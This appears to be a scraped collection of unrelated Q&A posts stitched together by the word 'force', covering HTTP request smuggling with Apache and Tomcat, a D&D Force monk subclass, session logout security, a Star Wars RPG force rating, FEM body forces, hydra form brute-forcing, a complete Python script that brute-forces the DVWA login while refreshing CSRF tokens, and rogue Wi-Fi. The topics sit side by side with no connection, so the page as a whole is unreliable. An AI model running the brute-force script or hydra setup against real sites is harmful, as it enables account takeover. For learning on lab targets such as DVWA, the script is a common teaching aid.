Force Apache Server/Tomcat to ignore Transfer-Encoding

I am trying to reproduce HTTP request smuggling using an Apache HTTP Server as a reverse proxy (using mod_proxy) and a Tomcat Server in the back-end.

Is it possible to force either Apache Server or Tomcat to ignore Transfer-Encoding in requests (and only use Content-Length)? Or is request smuggling simply not possible with this configuration?

Is this revised homebrew Way of the Force monk subclass balanced compared to the official monk subclasses?

This is a monk to emulate be a force user, as from the Star Wars universe.
There is a spoiler from The Last Jedi film. I thought that the ability to telekinetically affect your environment is too cool a concept to be left to a couple of spells, so I wanted to create a martial class that could utilise these concepts.

The homebrew subclass in this question was finally playtested, so I can come back and try and refine it.

However, it was not an extensive playtest, so assessment from the community is appreciated. Prior to playing, I removed the multiple concentration feature of Force Prowess, leaving just the increased cost for more targets component.

The main issues seen were:

  • the contested checks resulted in both more rolling and more swinginess in whether the ability worked
  • using contested checks instead of saves meant that boss targets couldn’t circumvent the abilities
  • the ability to force something prone from range or to restrain something were both very powerful (especially against flying targets)

It was also unsatisfying to attempt to use an effect, just for it to fail, and my limited resource be wasted. As I was playtesting, I also found myself unwilling to use the Greater Telekinesis feature that lets you move creatures as an attack – maybe this was just due to the situations I was in, but it could just be a quirk of the combats I found myself in.

Additionally, I made some changes to Force Choke, but was unable to test it.

The changes I’ve made off the back of the above issues are changing all of the contested checks to Strength saving throws. This simplifies the text, and lets legendary creatures save from the effects, as well as reduce the amount of rolling. I also switched to using the player’s wisdom modifier instead of proficiency modifier for effects that I wanted to have a limited number of targets; I don’t think this should change too much, however.

I am still worried about the balance and feel of this subclass. It still has the issue that, quite often, a turn can be wasted trying to get a target to succumb to a force effect, and you fail consistently, wasting a lot of resources. Other subclasses get features they can use without resources; currently, this subclass only has Life Sense for that. Additionally, the ability to force something prone, or to restrain a target, from range gives a large incentive to just keep trying to get these powerful effects. The use of Strength saving throws instead of Dexterity saving throws is also a tad worrying; I’m not sure how unbalanced that is, though.

How balanced does this subclass seem in relation to officially published monk subclasses? What ways could it be improved to increase player satisfaction, with regards to resource expenditure, that official subclasses take into account?

Way of the Force

Monks that follow the Way of the Force have learnt how to use their ki to manipulate their surroundings with their mind, tapping into the energy that inhabits all things.


Starting when you choose this tradition at 3rd level, you can use your ki to telekinetically manipulate the world around you. You gain the mage hand cantrip if you don’t already know it, and it is invisible.

Force Radius. A force radius of 30 ft that is centered on you defines where you can use ki specific force features. Your force radius increases to 60′ at level 11, and increases to 120 ft at level 17.

When you take the Attack action on your turn, you can forgo one of your attacks to spend 1 ki point to achieve one of the following effects against a Large or smaller creature, or an object, in your force radius.

  • Force Shove. The target must make a Strength saving throw. If they fail the save, you can do one of the following: knock the target prone, push the target up to half your Force Radius directly away from you, or pull the target up to half your Force Radius directly towards you. Unattended objects automatically fail this contested check, and if an object is held by a creature the creature makes the check.

  • Force Grab. The target must make a Strength saving throw. If the target fails the saving throw, it is grappled for one minute while you concentrate on the effect (as if concentrating on a spell). The target can use an action to try and break the grapple, repeating the saving throw.
    Unattended objects automatically fail this saving throw, and if an object is held by a creature the creature makes the save. An object held in this way can be moved to a location within your force radius up to half your force radius away from its origin point as an object interaction, and stay aloft in the air at the end of the move if you wish.

Greater Force Connection

Mind Powers. At level 6 your connection to the Force grows. You gain the ability to cast Charm Person (1 ki point) and Suggestion (2 ki points) using Wisdom as your spellcasting ability modifier. You can cast Charm Person at higher levels by spending one ki point for every level above first level you wish to cast it at, to a maximum total number of ki points equal to your wisdom modifier.

Life Sense. You can concentrate for a minute and learn the number of creatures within double your force radius, as well as their locations relative to your own. You do not learn any further information about these creatures, such as creature type or identity. You cannot detect either undead creatures or constructs with this feature.

Greater Telekinesis. Your Telekinesis abilities now work on Huge or smaller creatures and objects, and you can move creatures with Force Grab as well as objects. When moved in this way, you must use an attack to force the creature to make a Strength saving throw. If they fail, they are moved to a location of your choice within your force radius, following the same rules as moving objects with Force Grab. If they succeed, they are not moved.

Force Prowess

At 11th level you can apply the effects of Telekinesis to additional creatures and objects beyond the first by spending one ki point for each additional creature, up to a maximum of your wisdom modifier. When moving objects using Telekinesis, you can move any number of held objects using a single object interaction.
Your Telekinesis abilities now work on Gargantuan or smaller creatures and objects.
Finally, when you attempt to Force Grab a creature, you can increase the number of ki points you spend to 3 ki points and try to hold a creature more fully. Instead of being grappled when you succeed on the contested Force Grab check, a target is restrained, and repeats the contested check at the end of each of their turns. When you target additional creatures with this effect you must spend 3 additional ki points for each additional creature.

Force Mastery

At 17th level your mastery over your ki and the ki of others is legendary.

  • The radius of your life sense increases to 1 mile, and you can tell the creature type of each detected creature.
  • Creatures remain unaware of the effect you have had on their mind when you use Greater Force Connection abilities on them.

In addition to the features above, you can choose to gain one of the following features:

  • Force Choke. When a creature is held and restrained by your Force Grab, you can choose to start choking them if they are within half of your force radius. As an action on your turn, you can choose one creature that is under the effects of your Force Grab, and start choking them. They begin choking, and they become paralyzed for a minute. If they take any damage while paralyzed in this way, this effect ends on them. Additionally, you can use an action on following turns to crush the windpipe of any creature that has started choking in this way. They have to make a Constitution saving throw, or be reduced to 0 hit points. Creatures that don’t need to breathe cannot be reduced to 0 hit points in this way, but can still be paralyzed by this feature. If a creature manages to escape your Force Grab, they are no longer under any of the effects from this feature.

  • Force Lightning. As an action on your turn, you can spend 5 ki points to start spewing lightning at your foes, concentrating on this effect for up to one minute. A beam of lightning flashes out from your hand in a 5-foot-wide, 120-foot-long line. Each creature in the line must make a Dexterity saving throw. On a failed save, a creature takes 10d6 lightning damage. On a successful save, it takes half as much damage. You can create a new line of lightning as your bonus action on any subsequent turn until your concentration ends, without having to spend further ki points. These lines of lightning vanish at the end of your turn.

  • Force Projection. As an action on your turn, you can cast Mislead by spending 5 ki points. Instead of the duplicate appearing where you are, however, you can choose to make the duplicate appear within 30ft of an ally you are aware of on the same plane of existence as yourself.

Is it less secure to force periodic user logouts vs keep them logged in?

I’ve been unable to find any research or information on this.

Google periodically signs me out and forces me to sign back in. I have multiple devices and multiple google accounts so it’s a bit frustrating but that’s just how it is. However I was thinking about whether this practice is actually secure.

  1. It seems to encourage easy-to-remember / easy-to-type passwords over longer stronger passwords
  2. There’s more chance for a keylogger to intercept a password
  3. There’s more chance for a physical observer to watch you enter a password
  4. It may desensitise users and lead to them automatically entering their password without checking a url

How does this balance this against the inherent insecurity of indefinitely extending a login’s lifetime?

It’s worth noting that Google doesn’t ever log me out of my mobile device – I wonder why it treats this environment differently? Security vs UX concerns?

Is there a Maximum force rating?

I’m curious what the current maximum force rating is.

EDIT: Originally I had asked in regards to specs but with new info about character advancement I found out that the original question is making no sense any longer as you can take every spec (aside from those that are the same between books there only one of them like the force sensitive in edge of empire and age of rebellion which is the same spec): Taking out-of-career specialisations

So the question now would be what is the real maximum force rating? Characteristics are restricted to 6, skills to 5 (naturally lower each at char creation).

What about force rating does it have a maximum? With all the current specs added together: About 12 force rating is possible (maxed out all specs).

So the question like I said is: is there a max to force rating ruleswise?

Specify a force on the entire body (e.g. gravity)

In the thread Stress calculations using finite elements User21 showed an example how to define a force over the entire body during FEM calculation as boundary condition. See the screenshot below from the corresponding position in this thread.

enter image description here

In the description of the definition of the boundary condition – force on the entire bodyUser21 has defined the differential equation system as follows.

$ ps$ == {$ 0, -9.8$ }

Which unit has this power? Is the unit $ N/m^2$ ?

If $ N/m^2$ is the correct unit, then I can understand how to calculate the normalized body force from the density and volume of the body and insert it into the right side of the differential equation.

If $ N/m^2$ is not the right unit, then I have the following questions on you:

How is the density of the material or the mass considered here? Could you please show how to use this correctly in the equation?

In my case I have a centripetal acceleration due to rotation and the equation would look like this:

$ ps$ == {$ omega ^2 * x, omega ^2 * y$ }

Omega is the angular velocity of the body for which the deformations are to be calculated with FEM. And the expression

$ omega^2 * r$

is the centripetal acceleration, where $ r$ is the distance from the center of rotation.

However also here I have the problem, density resp. masses are not considered.

Does anybody have an answer to the question how to use the density and the mass correctly in the equation?

Many thanks in advance!

hydra brute force http-post-form

i know with hydra HTTP post form to success u have to insert error message when the password is wrong.

but in my case, i don’t have an error message, i have a redirection to page if error ..

how to solve the problem ?

login: /admins/

success: /admins/index.php

error: /my_account

this is the scenario …. how to solve my problem ?

Brute Force HIGH DVWA with Python Script

I’m new using python and I’m trying to BruteForce DVWA in High Level, I found this script from . But this error always pop up when I execute it. Any help is welcome,Thank U.


File “”, line 32, in csrf_token = soup.findAll(attrs={“name”: “user_token”})[0].get(‘value’) IndexError: list index out of range.

Whole Script:

from sys import argv import requests from BeautifulSoup import BeautifulSoup as Soup # give our arguments more semantic friendly names script, filename, success_message = argv txt = open(filename) # set up our target, cookie and session url = '' cookie = {'security': 'high', 'PHPSESSID':'b8dgqhbue8vdinrd87leug1no1'} s = requests.Session() target_page = s.get(url, cookies=cookie) '''  checkSuccess @param: html (String) Searches the response HTML for our specified success message ''' def checkSuccess(html):  # get our soup ready for searching  soup = Soup(html)  # check for our success message in the soup  search = soup.findAll(text=success_message)   if not search:   success = False  else:   success = True # return the brute force result  return success # Get the intial CSRF token from the target site page_source = target_page.text soup = Soup(page_source); csrf_token = soup.findAll(attrs={"name": "user_token"})[0].get('value') # Loop through our provided password file with open(filename) as f:  print 'Running brute force attack...'  for password in f:   # setup the payload   payload = {'username': 'admin', 'password': password, 'Login': 'Login', 'user_token': csrf_token}   r = s.get(url, cookies=cookie, params=payload)   success = checkSuccess(r.text)   if not success:    # if it failed the CSRF token will be changed. Get the new one    soup = Soup(r.text)    csrf_token = soup.findAll(attrs={"name": "user_token"})[0].get('value')   else:    # Success! Show the result    print 'Password is: ' + password    break # We failed, bummer.   if not success:   print 'Brute force failed. No matches found.' 

Can a malicious WIFI network force a connection

Say I enter a place with public WIFI. Of course, I would not connect to the network since I know it’s risky, but I do have my computer turned on. Can an attacker know my computer is there and force a connection to it? If they would be able to do so, than my precaution is wasted, and any attacks a malicious network could do would be done.

Telling me whether this could be done and how to stop it would be very helpful, thanks.

As a sidenote, connecting to a known network may not be safe either, could hackers “replace” an existing network with a malicious network with the same name? If so, how to protect myself against it?